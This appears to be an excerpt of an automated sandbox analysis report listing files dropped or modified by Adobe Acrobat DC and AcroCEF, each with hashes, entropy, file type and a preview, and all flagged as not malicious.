                                                                                                                                                                                                        SHA-256:1AC05BB56610D8A6F05E5CE295E5214EC084ECDE3AF038EB5639A7A08ACE305F
                                                                                                                                                                                                        SHA-512:E6E7C3ACBDA39C03D49219A14028AB71516EEEDCBA05393F8421DBB014E1E18B1235283377BE1918DAEF20E6D91F523F4B2C2058930752C2BBB4704DA44952BD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/12/21-09:02:26.585 1bfc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/21-09:02:26.587 1bfc Recovering log #3.2024/12/21-09:02:26.587 1bfc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):344
                                                                                                                                                                                                        Entropy (8bit):5.22375718750909
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:PCzuMM+q2PcNwi2nKuAl9Ombzo2jMGIFUt8+C8FZZmw++C8FMMVkwOcNwi2nKuAv:a5M+vLZHAa8uFUt8T8X/+T8qMV54ZHAv
                                                                                                                                                                                                        MD5:373EB0391C1EB5A74DC95DB976FCD8B1
                                                                                                                                                                                                        SHA1:A86B9CA13A89F98DFD47E58794759C46C72C3645
                                                                                                                                                                                                        SHA-256:1AC05BB56610D8A6F05E5CE295E5214EC084ECDE3AF038EB5639A7A08ACE305F
                                                                                                                                                                                                        SHA-512:E6E7C3ACBDA39C03D49219A14028AB71516EEEDCBA05393F8421DBB014E1E18B1235283377BE1918DAEF20E6D91F523F4B2C2058930752C2BBB4704DA44952BD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/12/21-09:02:26.585 1bfc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/21-09:02:26.587 1bfc Recovering log #3.2024/12/21-09:02:26.587 1bfc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\51c7e5a3-be1a-4ec9-86d1-23255d704aa0.tmp

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):475
                                                                                                                                                                                                        Entropy (8bit):4.963960758889477
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:YH/um3RA8sq6qhsBdOg2Hq2caq3QYiubSpDyP7E4TX:Y2sRdsdqydMHY3QYhbSpDa7n7
                                                                                                                                                                                                        MD5:A844DFE627B0B80FF938B38A743E6FCD
                                                                                                                                                                                                        SHA1:BD3892A64DB254967F13CEB632D247294C51CEC9
                                                                                                                                                                                                        SHA-256:F295FB8C3949580C609F3CC46DB78C85D0BB67B7F1B8A65A3C6447AA06DC9291
                                                                                                                                                                                                        SHA-512:DC2102F53EFD16B27CFB122D55A9AB46F8A302E38154CCE062967D1DCF4409B1CD98D282D062E2B26458409354D3CEC45DDD62F26A7F58D3531C91316366947D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379349755452646","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":744884},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):475
                                                                                                                                                                                                        Entropy (8bit):4.963960758889477
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:YH/um3RA8sq6qhsBdOg2Hq2caq3QYiubSpDyP7E4TX:Y2sRdsdqydMHY3QYhbSpDa7n7
                                                                                                                                                                                                        MD5:A844DFE627B0B80FF938B38A743E6FCD
                                                                                                                                                                                                        SHA1:BD3892A64DB254967F13CEB632D247294C51CEC9
                                                                                                                                                                                                        SHA-256:F295FB8C3949580C609F3CC46DB78C85D0BB67B7F1B8A65A3C6447AA06DC9291
                                                                                                                                                                                                        SHA-512:DC2102F53EFD16B27CFB122D55A9AB46F8A302E38154CCE062967D1DCF4409B1CD98D282D062E2B26458409354D3CEC45DDD62F26A7F58D3531C91316366947D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379349755452646","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":744884},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4099
                                                                                                                                                                                                        Entropy (8bit):5.237112088228742
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPT+irn:CwNw1GHqPySfkcigoO3h28ytPT+irn
                                                                                                                                                                                                        MD5:14B012CF32D109CC5D9E409CA0C206A1
                                                                                                                                                                                                        SHA1:2503E39321503FB3308A8D80901880C3E6CF84A9
                                                                                                                                                                                                        SHA-256:61E6A2F26DCE989E3D87C8B175FA2BC80AA68BB12F141200EF429928B56E3B98
                                                                                                                                                                                                        SHA-512:2EF36AD9185BBE4CB99E3D7603C6958FC7710CFE7879CA37EC485C7EF55068278ED66CB31689854501D43426D429E3CAD47BC23E142470E7117CD90F183422EB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                        Entropy (8bit):5.187462750712611
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:PyMM+q2PcNwi2nKuAl9OmbzNMxIFUt8+MFZZmw++vIDpMVkwOcNwi2nKuAl9Ombg:BM+vLZHAa8jFUt8T/+zpMV54ZHAa84J
                                                                                                                                                                                                        MD5:C7075CC6353470E8CA561B27EADAB0B1
                                                                                                                                                                                                        SHA1:F23B5B53939A97C030F4615EC1CB8C5B94386D96
                                                                                                                                                                                                        SHA-256:AE562AAAE4F8B42B3A5A93821B00158002F577313E39B3119F86D02180136485
                                                                                                                                                                                                        SHA-512:2539171FDD5299F35D820A5F2164C87E986B78864A0BDE238FCE0898EA584181E2D545183C26356BF2C4D5B0E9B21EBFD3486F4A2830CBCDA739B5891993036C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/12/21-09:02:27.035 1bfc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/21-09:02:27.037 1bfc Recovering log #3.2024/12/21-09:02:27.038 1bfc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                        Entropy (8bit):5.187462750712611
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:PyMM+q2PcNwi2nKuAl9OmbzNMxIFUt8+MFZZmw++vIDpMVkwOcNwi2nKuAl9Ombg:BM+vLZHAa8jFUt8T/+zpMV54ZHAa84J
                                                                                                                                                                                                        MD5:C7075CC6353470E8CA561B27EADAB0B1
                                                                                                                                                                                                        SHA1:F23B5B53939A97C030F4615EC1CB8C5B94386D96
                                                                                                                                                                                                        SHA-256:AE562AAAE4F8B42B3A5A93821B00158002F577313E39B3119F86D02180136485
                                                                                                                                                                                                        SHA-512:2539171FDD5299F35D820A5F2164C87E986B78864A0BDE238FCE0898EA584181E2D545183C26356BF2C4D5B0E9B21EBFD3486F4A2830CBCDA739B5891993036C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:2024/12/21-09:02:27.035 1bfc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/21-09:02:27.037 1bfc Recovering log #3.2024/12/21-09:02:27.038 1bfc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):86016
                                                                                                                                                                                                        Entropy (8bit):4.438296003279631
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:yeaci5GniBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1furVgazUpUTTGt
                                                                                                                                                                                                        MD5:9C1E926FC4E6AA90FC69ED09BFDED650
                                                                                                                                                                                                        SHA1:BBCA366F9907BFEA05F067BBC286FA33ACB462D6
                                                                                                                                                                                                        SHA-256:3BB3276C6A189DDE24E9FFB24701E36990077A06F642C0C00EBAB4ACAE72C0DF
                                                                                                                                                                                                        SHA-512:687A1812235A303B968B098CECAD5856184BFF1CE378FCCD52A7314A958D5E0568D7055FC6FB2A161ADA51105B25B7A20BF44F5DA8CF13AD2D0BF807D8B3BE40
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:SQLite Rollback Journal
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8720
                                                                                                                                                                                                        Entropy (8bit):3.773175838896328
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:7MipA2ioyVYioygoWoy1CABoy1kKOioy1noy1AYoy1Wioy11ioyeioyBoy1noy1H:7RpfuY2AUX2jiLb9IVXEBodRBkf
                                                                                                                                                                                                        MD5:BB535B3792A0618567DEEB9E0BAA7924
                                                                                                                                                                                                        SHA1:6DE5140CF6B3CD8B273D9089E709E69A29F0F1DE
                                                                                                                                                                                                        SHA-256:E18997D993E97622E4F063ABF5EE8FA7789EAD0237402936DD111FEC0711AA9C
                                                                                                                                                                                                        SHA-512:B7CE81BBF88311A0A9BA713B870D4A07B421A8B393DDC7F559BCD23D739687FDAE03676628B67881DB990957516503FEB66B8C5F168D3F0D47C67A079763D5A2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.... .c.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1391
                                                                                                                                                                                                        Entropy (8bit):7.705940075877404
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                                                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                                                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                                                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                                                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):71954
                                                                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):192
                                                                                                                                                                                                        Entropy (8bit):2.7457468364538267
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:kkFkl1Fpl1fllXlE/HT8kClzXNNX8RolJuRdxLlGB9lQRYwpDdt:kKEL2T8P3NMa8RdWBwRd
                                                                                                                                                                                                        MD5:DE0D82BC80A79A2FB201BD27CF393F47
                                                                                                                                                                                                        SHA1:0C1A324E062D03B99CEF792BB77EBC5CE490FF77
                                                                                                                                                                                                        SHA-256:16FE3B82750C576A5E9B0DC9D392FE4F2A3D2CF0DCBAE66132223AF020073EC9
                                                                                                                                                                                                        SHA-512:C5860F464FE0824635528BC656DB6AE87ACEE5BD9B7C0E4AA9B1493A682F5DEC822780852E116A6F2B397AD569E89C6E16B363E45BBC17AEA60BB834BDAF4404
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:p...... .........M...S..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                        Entropy (8bit):3.241800306278292
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:kKabT9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:C2DImsLNkPlE99SNxAhUe/3
                                                                                                                                                                                                        MD5:0B459B15C60E095BA88D6C3103C476D0
                                                                                                                                                                                                        SHA1:B775F6D9BD264614FF5D4268B300BC3FDBF4F511
                                                                                                                                                                                                        SHA-256:E32BBC71C5F536FF8EA8FC2058A8A4B95C0E2A1C8507982A480DDD3BC29B2EFF
                                                                                                                                                                                                        SHA-512:FC538FEBB1D5A4D7AD5C6A30BA7DBA4258B700F3A5707D083D3A9747434DC77670E1D31D86A4BCD496D7856620A58A305C514B41AA3386E31FDA31A671C42CA5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:p...... ............S..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:PostScript document text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1233
                                                                                                                                                                                                        Entropy (8bit):5.233980037532449
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7800

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:PostScript document text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1233
                                                                                                                                                                                                        Entropy (8bit):5.233980037532449
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                        File Type:PostScript document text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1233
                                                                                                                                                                                                        Entropy (8bit):5.233980037532449
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                                                                                                        Malicious:false
